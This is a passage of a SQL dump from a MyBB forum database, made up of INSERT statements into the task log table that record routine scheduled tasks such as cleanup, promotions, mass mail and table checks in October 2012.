task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11833', '1', '1350819141', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11834', '7', '1350819149', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11835', '5', '1350819160', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11836', '9', '1350819402', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11837', '9', '1350819610', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11838', '5', '1350820328', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11839', '9', '1350820869', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11840', '3', '1350820905', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11841', '1', '1350820922', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11842', '4', '1350820930', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11843', '7', '1350820938', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11844', '5', '1350821117', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11845', '9', '1350821480', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11846', '5', '1350822478', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11847', '9', '1350822622', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11848', '3', '1350822711', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11849', '9', '1350823283', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11850', '5', '1350824029', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11851', '9', '1350824112', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11852', '3', '1350824360', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11853', '1', '1350824414', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11854', '7', '1350824464', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11855', '5', '1350824815', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11856', '9', '1350825638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11857', '5', '1350826633', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11858', '9', '1350826657', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11859', '3', '1350826663', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11860', '9', '1350829002', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11861', '5', '1350829058', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11862', '3', '1350829104', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11863', '1', '1350829108', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11864', '7', '1350829126', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11865', '5', '1350829518', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11866', '9', '1350829548', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11867', '3', '1350831400', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11868', '9', '1350831831', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11869', '5', '1350831833', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11870', '3', '1350831874', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11871', '1', '1350831903', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11872', '7', '1350831920', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11873', '5', '1350831960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11874', '9', '1350832311', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11875', '5', '1350833592', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11876', '9', '1350833629', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11877', '3', '1350833653', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11878', '9', '1350834327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11879', '5', '1350834343', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11880', '9', '1350834926', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11881', '3', '1350835202', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11882', '1', '1350835311', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11883', '7', '1350835319', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11884', '5', '1350835645', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11885', '9', '1350836519', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11886', '5', '1350836735', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11887', '9', '1350836747', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11888', '3', '1350837031', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11889', '9', '1350837848', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11890', '5', '1350838113', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11891', '9', '1350839217', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11892', '3', '1350840442', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11893', '1', '1350840451', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11894', '7', '1350840456', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11895', '5', '1350840479', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11896', '9', '1350840607', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11897', '3', '1350841017', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11898', '9', '1350841443', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11899', '5', '1350841502', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11900', '9', '1350842461', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11901', '3', '1350842554', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11902', '1', '1350842557', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11903', '7', '1350842568', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11904', '5', '1350842935', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11905', '9', '1350843262', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11906', '5', '1350843910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11907', '9', '1350843918', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11908', '3', '1350844277', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11909', '9', '1350844817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11910', '5', '1350845103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11911', '9', '1350845732', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11912', '3', '1350846033', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11913', '1', '1350846039', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11914', '7', '1350846095', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11915', '5', '1350846630', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11916', '9', '1350846635', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11917', '5', '1350847521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11918', '9', '1350847548', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11919', '3', '1350847803', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11920', '9', '1350848500', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11921', '5', '1350848716', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11922', '9', '1350849345', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11923', '3', '1350849585', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11924', '1', '1350849753', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11925', '7', '1350849767', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11926', '5', '1350849901', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11927', '9', '1350850227', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11928', '5', '1350851151', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11929', '9', '1350851202', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11930', '3', '1350851409', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11931', '9', '1350852023', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11932', '5', '1350852377', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11933', '9', '1350853155', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11934', '3', '1350853316', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11935', '1', '1350853357', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11936', '7', '1350853363', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11937', '5', '1350853512', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11938', '9', '1350853879', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11939', '5', '1350854852', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11940', '9', '1350854996', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11941', '3', '1350855040', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11942', '9', '1350855620', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11943', '5', '1350855913', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11944', '9', '1350856784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11945', '3', '1350856786', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11946', '1', '1350856809', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11947', '7', '1350856813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11948', '5', '1350857129', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11949', '9', '1350857434', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11950', '5', '1350858319', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11951', '9', '1350858340', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11952', '3', '1350858612', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11953', '9', '1350859204', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11954', '5', '1350859506', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11955', '9', '1350860124', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11956', '3', '1350860363', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11957', '1', '1350860402', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11958', '7', '1350860404', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11959', '5', '1350860715', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11960', '9', '1350861005', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11961', '5', '1350861902', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11962', '9', '1350861915', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11963', '3', '1350862206', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11964', '9', '1350862804', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11965', '5', '1350863107', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11966', '9', '1350864203', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11967', '3', '1350864217', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11968', '1', '1350864245', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11969', '2', '1350864272', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11970', '7', '1350865198', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11971', '11', '1350865240', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11972', '5', '1350865248', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11973', '9', '1350865287', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11974', '5', '1350865631', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11975', '9', '1350865640', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11976', '3', '1350865819', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11977', '9', '1350866590', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11978', '5', '1350866705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11979', '9', '1350867304', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11980', '3', '1350867581', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11981', '1', '1350867717', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11982', '7', '1350867724', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11983', '5', '1350867910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11984', '9', '1350868238', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11985', '5', '1350869129', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11986', '9', '1350869793', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11987', '3', '1350869812', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11988', '9', '1350870048', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11989', '5', '1350870310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11990', '9', '1350870942', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11991', '3', '1350871186', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11992', '1', '1350871356', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11993', '7', '1350871392', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11994', '5', '1350871566', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11995', '9', '1350871833', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11996', '5', '1350872703', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11997', '9', '1350872717', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11998', '3', '1350873017', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11999', '9', '1350873660', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12000', '5', '1350873909', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12001', '9', '1350874539', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12002', '3', '1350874742', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12003', '1', '1350874801', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12004', '7', '1350874801', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12005', '5', '1350875102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12006', '9', '1350875423', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12007', '5', '1350876307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12008', '9', '1350876318', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12009', '3', '1350876614', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12010', '9', '1350877215', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12011', '5', '1350877569', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12012', '9', '1350878117', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12013', '3', '1350878378', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12014', '1', '1350878436', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12015', '7', '1350878447', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12016', '5', '1350878727', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12017', '9', '1350879049', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12018', '5', '1350879931', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12019', '9', '1350879937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12020', '3', '1350880393', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12021', '9', '1350880814', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12022', '5', '1350881103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12023', '9', '1350881796', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12024', '3', '1350882020', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12025', '1', '1350882031', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12026', '7', '1350882033', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12027', '5', '1350882314', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12028', '9', '1350882614', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12029', '5', '1350884068', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12030', '9', '1350884096', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12031', '3', '1350884572', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12032', '3', '1350884572', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12033', '9', '1350885012', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12034', '5', '1350885107', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12035', '9', '1350885354', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12036', '3', '1350886906', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12037', '1', '1350887318', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12038', '7', '1350887955', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12039', '5', '1350887993', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12040', '9', '1350888096', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12041', '3', '1350888356', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12042', '5', '1350888361', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12043', '9', '1350889015', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12044', '3', '1350889170', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12045', '1', '1350889345', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12046', '7', '1350889358', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12047', '5', '1350889691', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12048', '9', '1350889870', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12049', '5', '1350890799', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12050', '9', '1350890863', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12051', '3', '1350892577', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12052', '9', '1350892611', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12053', '5', '1350892617', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12054', '3', '1350894136', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12055', '1', '1350896028', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12056', '7', '1350896048', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12057', '5', '1350896348', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12058', '9', '1350896776', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12059', '3', '1350898866', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12060', '1', '1350898871', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12061', '7', '1350898880', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12062', '5', '1350898883', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12063', '9', '1350898891', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12064', '5', '1350900302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12065', '9', '1350900462', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12066', '3', '1350900491', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12067', '1', '1350900503', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12068', '7', '1350900538', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12069', '9', '1350900614', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12070', '5', '1350901520', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12071', '9', '1350901580', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12072', '3', '1350901822', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12073', '9', '1350902429', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12074', '5', '1350902708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12075', '9', '1350903313', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12076', '3', '1350903570', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12077', '1', '1350903667', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12078', '7', '1350903738', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12079', '5', '1350903959', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12080', '9', '1350904833', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12081', '5', '1350905113', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12082', '9', '1350905129', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12083', '3', '1350905612', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12084', '9', '1350906102', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12085', '5', '1350906318', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12086', '9', '1350906912', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12087', '3', '1350907148', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12088', '1', '1350907201', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12089', '4', '1350907212', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12090', '7', '1350907896', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12091', '5', '1350907963', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12092', '9', '1350907996', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12093', '5', '1350908736', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12094', '9', '1350908750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12095', '3', '1350909005', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12096', '9', '1350909622', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12097', '5', '1350909999', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12098', '9', '1350910707', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12099', '3', '1350910770', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12100', '1', '1350910855', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12101', '7', '1350910859', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12102', '5', '1350911262', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12103', '9', '1350911452', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12104', '5', '1350912932', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12105', '9', '1350913403', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12106', '3', '1350913532', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12107', '5', '1350913596', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12108', '9', '1350914612', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12109', '3', '1350914647', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12110', '1', '1350914697', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12111', '7', '1350914711', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12112', '5', '1350914727', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12113', '9', '1350915343', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12114', '5', '1350915978', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12115', '9', '1350916017', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12116', '3', '1350916203', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12117', '9', '1350916941', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12118', '5', '1350917218', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12119', '9', '1350918265', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12120', '3', '1350918291', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12121', '1', '1350918293', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12122', '7', '1350918298', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12123', '5', '1350918308', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12124', '9', '1350918688', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12125', '5', '1350919701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12126', '9', '1350919729', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12127', '3', '1350919908', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12128', '9', '1350921683', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12129', '5', '1350921693', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12130', '3', '1350921757', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12131', '1', '1350921783', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12132', '7', '1350921789', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12133', '5', '1350921917', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12134', '9', '1350922716', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12135', '5', '1350923375', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12136', '9', '1350923379', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12137', '3', '1350923561', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12138', '9', '1350925540', 'The mass mail task 